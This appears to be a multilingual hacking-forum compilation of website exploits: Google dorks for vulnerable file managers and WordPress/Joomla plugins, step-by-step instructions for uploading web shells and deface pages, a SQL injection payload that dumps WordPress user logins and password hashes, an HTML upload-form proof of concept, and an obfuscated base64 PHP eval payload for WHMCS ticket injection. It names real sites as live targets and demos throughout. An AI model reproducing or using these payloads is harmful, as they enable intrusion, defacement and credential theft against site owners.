Exploits

/ajaxfilemanager file uploader deface on txt/jpg not sure about html/

Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ - See more at: http://mxdotmy.blogspot.kr/2013/04/ajax-file-manager-shell-and-files.html#sthash.xj3zu2j0.dpuf

 or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else ...
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url


for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Now Find Upload Upload and Upload Your shell/Deface/file To view you File find /Uploaded/ directory in Website by using your brain :P example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt

------------------
WordPress File Upload com Asset Manager

Dork:inurl:Editor/assetmanager/assetmanager.asp

--------------------
Hack Blog/WordPress forma facil facil :D


Dork: inurl:"fbconnect_action=myhome"
2. Agora, abra qualquer link abaixo.
3. Depois de abrir o link basta alterar essa parte da ?fbconnect_action=myhome&userid= com este aqui:

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--

----------------------
Hack sites usando RTE webwiz Vulnerabilidade

Primeiro procure o Dork Dork para esta vulnerabilidade é "inurl:rte/my_documents/my_files"
O Exploit é site.com/rte/RTE_popup_file_atch.asp

site.com/admin/RTE_popup_file_atch.asp

exemplo, eu encontrei um site que é vulnerável a RTE Site: http://www.billkonigsberg.com Vulnerabilidade http://www.billkonigsberg.com/RTE_popup_file_atch.asp Agora é so carregar a página deface no site, depois de carregar a sua página.
Obs: Procure outra pagina pois está ja não está mais vulneravel

--------------------------
EzFilemanager Deface Upload

Dork para EzFilemanager é "inurl:ezfilemanager/ezfilemanager.php"
(Você pode modificar esse dork para obter mais resultados no google)
Exploit: http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Ir para este URL:  website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php e colocar ?sa=1&type=file depois da URL
agora url será: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Agora ver a opção de upload e você pode fazer o upload, html, pdf, ppt, txt, doc, rtf, xml, xsl, DTD, zip, rar, jpg, png
---------------------------

Title : Wordpress Exploit Easy Comment Upload

Dork : inurl:easy-comment-uploads/upload-form.php

POC :  /wp-content/plugins/easy-comment-uploads/upload-form.php

1. Pergi Google masukkan dork ke dalam Search dan Go.

               Dork : inurl:easy-comment-uploads/upload-form.php

2. Pilih target.

3. Ada butang choose file tu tekan dan upload file anda.

4. Tidak semua dapat support html/php/asp sebab bug ne sudah fix 12/09/2011.

5. Dapat target untuk upload html kira bertuahlah.

Untuk lihat hasil file upload anda tambah /wp-content/uploads/2011/10/nama_file_anda.extension
---------------------------------
JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY

Assalamualaikum hari ini aku nak share exploit joomla lagi.Exploit ini korang bole upload shell.Ok jom mula.

1. Google dork :
inurl:"index.php?option=com_smartformer"

2. Pilih salah satu target dah akan keluar contoh mcm dalam gambar di bawah :


Isi maklumat macam dalam gambar.
Lepas tu SUBMIT.

Akan keluar lebih kurang macam gambar di bawah :


Ok kalau keluar mcm ni mksudnya shell korang dah masuk.Tapi kalau tak keluar macam ni contoh nya dia tulis "File rejected","file contain virus", dll maksudnya korang tak boleh upload shell.

3. Untuk tengok hasil :
http://target.com/components/com_smartformer/files/SHELL.php

target.com = ganti dengan url website yg korang dapat SHELL.php tu ganti dengan nama shell korang.

note : ada website yang bole upload tapi bila buka shell tulis not found.tu maksudnya website tu simpan shell tu di directory lain.korang kena cari explore seniri.

SIAP!

Live Demo :
http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3

Result :
http://www.northendthrift.com/components/com_smartformer/files/hello.htm

-------------------------------------------
WordPress "photocrati-theme" Remote File Upload "RFU"


As-salam salam sejahteranye pun aduii... ok hari ni ku nak ajar exploit wordpress sangat simple upload shell dah terus boleh hack ok jom mulakannya pun aduiii... Dork nya


"inurl:wp-content/themes/photocrati-theme/admin" ok kembang2 kan la dork nya yach << indon -_- ok seterusnya  korang akan jumpa website macam ini http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/gallery-iframe.php?gal_id=65_1&gal_type=1&gal_cap=OFF&gal_page=true&page_template=false&bg=42413F seterusnya korang cuma perlu ganti dengan  upload_edit.php contohnya macam ini http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php maka akan terpapar tempat nak upload shell macam nie


ok lepas 2 korang bolehlah upload shell berbentuk shell.php.jpg


ramai tnya mana nak dapat shell.php.jpg ?? korang cuma perlu rename nama shell korang saje jadi shell.php.jpg

dah korang upload tekan menekan add images

ok dah selesai upload shell korang akan kuar di sini

http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg

contoh shell yang aku dah upload

http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/taik.php.jpg

------------------------------
Hack with WHM Submit ticket exploit

Upload Script

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OE{php}eval(base64_decode('wyWnZjbTAgSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSSBQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSSBWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JIFBHSnlQaWM3SUgwTkNuME5DajggIik7ICR2ID0gYmFzZTY0X2RlY29kZSgiSkhZZ1BTQWtTRlJVVUY5RFQwOUxTVVZmVmtGU1Uxc2lkbWx6YVhSeklsMDdEUW9nYVdZb0lDUjJJRDA5SUNJaUtRMEtJSHNrZGlBOUlEQTdEUW9nSkhacGMybDBiM0lnUFNBa1gxTkZVbFpGVWxzaVVrVk5UMVJGWDBGRVJGSWlYVHNOQ2lBa2QyVmlJRDBnSkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE93MEtJQ1JwYm1vZ1BTQWtYMU5GVWxaRlVsc2lVa1ZSVlVWVFZGOVZVa2tpWFRzTkNpQWtkR0Z5WjJWMElEMGdjbUYzZFhKc1pHVmpiMlJsS0NSM1pXSXVKR2x1YWlrN0RRb2dKR0p2WkhrZ1BTQWlVMmhsYkd3Z1YyaHRZM01nUkdrZ09pQWtkR0Z5WjJWMElHbHdJQ1IyYVhOcGRHOXlJanNnUUcxaGFXd29JbmRoYkdGb01UVTVRR2R0WVdsc0xtTnZiU0lzSWlBa2RHRnlaMlYwSWl3Z0lpUmliMlI1SWlrN0RRb2dmU0JsYkhObElIc05DaUFrZGpzTkNpQjlJSE5sZEdOdmIydHBaU2dpZG1semFYUnpJaXdrZGlrNyIpOyAkZm8gPSBmb3BlbigidGVtcGxhdGVzL3gucGhwIiwidyIpOyBmd3JpdGUoJGZvLCRjb2RlLCR2KTs=')) ;{/php})  <---- copy paste on description,title and also name for the email is your choice if paste doesnt work use fake or your alt email


Dork

1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=

intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"

------------------------------------------------
Deface Website Dengan Spaw File Manager


                           SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY


Jom Start!!

1. Masukkan  salah satu Dork ini di  Google search


 = inurl:Spaw2/dialogs/
 = Inurl:spaw2/uploads/files \
 = Index of:/Spaw2/uploads/files

2.Pilih satu  website dan masukan exploit dihujung URL...  dan tekan enter.


Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

site/anydork/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

----------------------------------------

xploit WordPress  “/easy-comment-uploads/upload-form.php”


—————————————————————————-
| Title : WordPress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
| Date : 15/06/2011
| Dork : “/easy-comment-uploads/upload-form.php”
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
—————————————————————————-


*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
# File Extention [.txt],[.jpg],[gif],[png],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/06/shell.php;.txt
=========================================================
Demo langsung :


http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg
-----------------------------------------------------------
"Encodable" ~ another Deface and shell upload Vulnerablity


Title : "Encodable" ~ another File upload Vulnerablity
Google Dork : "intext:File Upload by Encodable"

Lets Start .. xd
open google.com and enter this dork :  "intext:File Upload by Encodable"


result comes with 166,000 results but some results are fake ... its may be malwaers
so pick real things only , "Upload a file"  You will this title in search results here :)
click the sites sites only which comes with upload a file title
after click the link you'll got a upload form
you'll saw some options in this form like name Description email etc ...
 type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc :P

now choose you file and upload it :)

after clicking on upload button a pop up will be open ... dont close it, it will automatilcly closed
after uploading file

in some sites you'll got you uploaded file link after uploading on website
and if you did not file it then try these url
/upload/files/
or /upload/userfiles/

Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx
Uploaded page : http://150.101.230.65:8008/upload/files/xd.html
---------------------------------------------------------------------------
Uploading defaces pages JOOMLA
http://mxdotmy.blogspot.kr/2013/04/cara-deface-dengan-teknik-exploit-joomla.html

Thanks Indonesia Cyber Army lovaya

---------------------------------------------------------------------------
As-salam korang semua harap2 baik2 saja dah lama x update blog nie ok hari ni ku nak ajar korang cara hack website dengan method CSRF ? apa 2 CSRF?? CSRF ialah cross site scripting haha betul x aku xtau ok jom mula :D dork : inurl:/plugins/simple-forum/

/resources/jscript/ajaxupload/sf-uploader.php

kt belakang contoh akan jadi cmni

www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php

dia akan kuar tulisan = error

kalau kuar acces denied x boleh la 2

poc dia


<form enctype="multipart/form-data"  action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> upload poc dia dalam mana web save as.html lepas 2 tukar website yang ada tulisan error masuk kan dalam poc 2 bila bukak akan kuar form upload dan upload la shell shell korang akan kuar kt sini wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php


----------------------

Wp mini forum defaces and shells uploads

inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload

site.com/wp-content/uploads/tdomf/tmp/1/ip address korang/shell.php.jpg
--------------------------------

Asset Manager :Shell and Files upload Vulnerability

Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"

Open Google.com/ncr and enetr this dork

"inurl:Editor/assetmanager/assetmanager.asp"

Now Open any site from search results


Upload File:

and site url will be like site.com/Editor/assetmanager/assetmanager.asp

Change The Flash into all Files and Now choose Your File and Upload

and acess Your file here site.com/Editor/assets/yourfilehere
-------------------------
Xampp/lang.tmp Exploit

inurl:"xampp/lang.tmp"

/xampp/lang.tmp change to /xampp/lang.php?MESSAGE HERE